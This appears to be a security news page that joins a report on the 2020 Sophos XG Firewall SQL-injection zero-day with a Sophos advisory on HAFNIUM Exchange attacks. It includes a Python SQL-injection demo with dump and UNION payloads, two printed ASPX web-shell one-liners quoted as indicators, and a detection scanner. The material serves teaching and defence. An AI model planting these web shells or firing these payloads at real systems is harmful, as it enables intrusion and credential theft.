Sophos Zero Day



Posted on April 26, 2020 at 2:48 PM

Sophos has patched a SQL injection flaw in its XG Firewall product that attackers were exploiting in the wild. Sophos was informed of the bug on April 22, 2020; its analysis found that attackers could compromise devices that had either the administration interface (HTTPS admin service) or the User Portal exposed on the WAN zone. The zero-day was fixed after Sophos received reports that hackers were actively exploiting it in attacks.

The cybersecurity firm Sophos has joined the long list of vendors whose products have been compromised by hackers.

Yesterday, the company published a security update that was necessary to patch a zero-day vulnerability in its XG enterprise firewall product. It said the firewall product had been the subject of abuse by hackers.

Sophos revealed that it first discovered the zero-day vulnerability on Wednesday, after receiving an alert from one of its customers. According to the customer, a suspicious field value was visible in the management interface of its XG firewall.

During the investigation, Sophos realized that the suspicious field value was not an error but an actual attack on the device.

Hackers stole passwords by abusing an SQL injection bug

Sophos revealed that the hackers gained access to exposed XG devices using an SQL injection vulnerability.

They targeted Sophos XG firewalls that had the User Portal control panel or the HTTPS administration service exposed to the internet (the WAN zone).

Sophos also reiterated that the cybercriminals took advantage of the SQL injection weakness to download a payload onto the device. Once running, the payload stole files from the XG firewall.
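The page does not publish the injected request or the XG schema, so the following is an added illustration of the bug class, not Sophos's code: a user-lookup query built by string concatenation sits beside the same query with a bound parameter. The table, usernames and password hashes are constructed sample data. The concatenated form lets a crafted username return every row of the hash table (the kind of data exfiltrated here) and even enumerate the schema through a UNION; the parameterized form treats the same input as a literal string and returns nothing.

```python
import hashlib
import sqlite3

# Constructed sample data (hypothetical schema, not the XG firewall's):
# a minimal portal user table holding usernames and password hashes.
SAMPLE_USERS = [
    ("admin", "hunter2"),
    ("alice", "Passw0rd!"),
    ("bob", "correct horse"),
]


def build_db():
    """Create an in-memory database populated with the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT)")
    for user, pw in SAMPLE_USERS:
        # Unsalted SHA-256 is used only to keep the example short; real
        # systems should use a slow, salted password hash.
        digest = hashlib.sha256(pw.encode()).hexdigest()
        conn.execute("INSERT INTO users VALUES (?, ?)", (user, digest))
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """Untrusted input is concatenated into the SQL text: the injection pattern.
    The quote characters in a crafted username close the literal and let the
    attacker append their own SQL."""
    sql = f"SELECT username, pw_hash FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Same query with a bound parameter: the input is always data, never SQL."""
    sql = "SELECT username, pw_hash FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Classic tautology: the WHERE clause becomes username = 'x' OR '1'='1',
# which is true for every row, so the whole hash table comes back.
DUMP_PAYLOAD = "x' OR '1'='1"

# UNION-based schema enumeration: appends a second SELECT against the
# catalogue table and comments out the trailing quote with "--".
SCHEMA_PAYLOAD = "x' UNION SELECT name, sql FROM sqlite_master--"


if __name__ == "__main__":
    db = build_db()
    print("normal lookup:", lookup_vulnerable(db, "alice"))
    print("vulnerable + dump payload:", lookup_vulnerable(db, DUMP_PAYLOAD))
    print("vulnerable + schema payload:", lookup_vulnerable(db, SCHEMA_PAYLOAD))
    print("parameterized + dump payload:", lookup_parameterized(db, DUMP_PAYLOAD))
```

The fix is not input filtering but never letting user input reach the query text; the parameterized function needs no escaping logic at all.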

According to the security firm, the compromised data included usernames and hashed passwords of the local accounts used to access the device: the firewall's portal admins and the user accounts for the firewall itself.

Apart from these details, stored credentials for external authentication systems such as LDAP or Active Directory were also exposed.

The security firm pointed out that, at the time of the investigation, it had no evidence that the attackers accessed XG firewall devices using the stolen passwords. It also found no sign of intrusion into customers' internal networks or of any compromise beyond the firewall.

Sophos said updates have been sent to customers

The UK security firm, renowned for its popular antivirus products, disclosed that it has already sent the update to its customers to patch the vulnerability. The update is delivered automatically to all XG firewalls that have the auto-update feature enabled.

Sophos said that once the hotfix is applied there can be no further exploitation of the device. It said the hotfix also stopped the XG firewall from reaching the attacker infrastructure and halted further infiltration of the devices.

"This hotfix eliminated the SQL injection vulnerability which prevented further exploitation," the security firm said.

In addition to the fix, the hotfix adds a notice to the XG firewall control panel that tells customers whether their device was compromised.

Recommendations for affected customers

Sophos has also recommended remediation steps for customers whose devices were hacked. The steps include rebooting the device and resetting its passwords. It said the hackers will no longer have access to the devices once companies reboot them and reset the passwords.

Even though the compromised records contain hashed rather than plaintext passwords, Sophos is recommending that customers reset the passwords of any account whose XG credentials might have been reused elsewhere:

"Although the passwords were hashed, it is recommended that passwords are reset for any accounts where the XG credentials might have been reused."

Furthermore, the security firm recommended that companies that do not need the firewall's User Portal and administration interface exposed on internet-facing ports should disable them. It has provided instructions for disabling these interfaces in its official report on the incident.

Sophos is a security software and hardware firm that develops security products for unified threat management, mobile security, email security, network security, encryption, and endpoint protection.

The company recently introduced its new security product Sophos Intercept X, which combines four critical components to provide security to its customers.

The recent attack on its product shows the lengths hackers will go to in order to infiltrate companies. If cybercriminals can compromise tech companies like Facebook and Twitter, and now the product of a cybersecurity company, it shows they are capable of targeting any system.

As a result, organizations are advised to strengthen their security posture and apply updates as quickly as possible to keep their networks and data secure.

Sophos says Hackers have Compromised its Firewall Zero-Day
Author: Koddos


Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

Sophos protections against HAFNIUM

Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Sophos Firewall

IPS signatures for customers running SFOS and XFOS:

CVE              SID
CVE-2021-26855   57241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-26857   57233, 57234
CVE-2021-26858   57245, 57246
CVE-2021-27065   57245, 57246

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

CVE              SID
CVE-2021-26855   57241, 57242, 57243, 57244
CVE-2021-26857   57233, 57234
CVE-2021-26858   57245, 57246
CVE-2021-27065   57245, 57246

If you see these detection names on your networks you should investigate further and remediate.

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/ASPDoor-U
  • Troj/ASPDoor-V
  • Troj/AspScChk-A
  • Troj/Bckdr-RXD
  • Troj/WebShel-O
  • Troj/WebShel-P

Other payloads

  • Mal/Chopper-A
  • Mal/Chopper-B
  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>

ExternalUrl : http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>
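The two ExternalUrl values above are the pattern to hunt for: a field that should hold a plain URL instead carries a server-side ASP.NET script block. The following is an added example of that check, not one of Sophos's EDR queries. It scans text in the "Name/InternalUrl/ExternalUrl : value" shape that Exchange's Get-OabVirtualDirectory prints (a constructed sample is embedded; the regexes and reason labels are this example's own) and reports any URL field containing a runat="server" script, an eval() call, or a file write from an uploaded request, so it catches both the JScript eval shell and the C# upload-and-save shell.

```python
import re

# Constructed sample in the "Field : value" layout; the two ExternalUrl
# shells mirror the indicators quoted above, the rest is benign filler.
SAMPLE_OUTPUT = """\
Name        : OAB (Default Web Site)
InternalUrl : https://mail.example.test/OAB
ExternalUrl : https://mail.example.test/OAB
Name        : OAB (Default Web Site)
InternalUrl : https://mail2.example.test/OAB
ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>
Name        : OAB (Default Web Site)
ExternalUrl: http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>
"""

# "ExternalUrl : value" or "ExternalUrl: value"; the spacing varies in real output.
URL_FIELD = re.compile(r"^\s*(InternalUrl|ExternalUrl)\s*:\s*(.*)$", re.IGNORECASE)

# Each indicator maps a regex to a short reason string for the finding.
INDICATORS = [
    (re.compile(r"<script[^>]*runat\s*=\s*[\"']?server", re.IGNORECASE),
     "server-side script block in URL field"),
    (re.compile(r"\beval\s*\(", re.IGNORECASE),
     "dynamic code execution via eval()"),
    (re.compile(r"Request\.Files.*\.SaveAs\s*\(", re.IGNORECASE),
     "uploaded file written to disk"),
]


def scan_oab_output(text):
    """Return one finding per URL field that does not look like a plain URL.

    A finding is a dict with the 1-based line number, the field name, the
    offending value and the list of matched reasons. Any '<' in a URL field is
    reported even when no specific indicator matches, since a legitimate OAB
    URL never contains markup."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = URL_FIELD.match(line)
        if not m:
            continue
        field, value = m.group(1), m.group(2).strip()
        reasons = [reason for pattern, reason in INDICATORS if pattern.search(value)]
        if not reasons and "<" in value:
            reasons.append("unexpected markup in URL field")
        if reasons:
            findings.append({"line": lineno, "field": field,
                             "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_oab_output(SAMPLE_OUTPUT):
        print(f"line {f['line']} {f['field']}: {', '.join(f['reasons'])}")
        print("   ", f["value"][:80])
```

On a real server the input would be the output of Get-OabVirtualDirectory run against each Exchange host; a hit means the web shell file referenced by the virtual directory still has to be located and removed by hand, as the post notes.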

Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the HAFNIUM group in their attacks. Sophos Intercept X detects and blocks DearCry via:

  • Troj/Ransom-GFE
  • CryptoGuard

Editor note: Post updated with addition of IPS signatures for Sophos UTM and additional detections. 2021-03-10 08:35 UTC

Editor note: Post updated with additional anti-malware signatures for Intercept X and Sophos Antivirus (SAV) 2021-03-11 14:30 UTC

Editor note: Post updated to advise that signatures are now present on the Endpoint IPS, and the addition of two further AV signatures 2021-03-12 09:10 UTC

Editor note: Post updated with DearCry ransomware detections 2021-03-12 16:30 UTC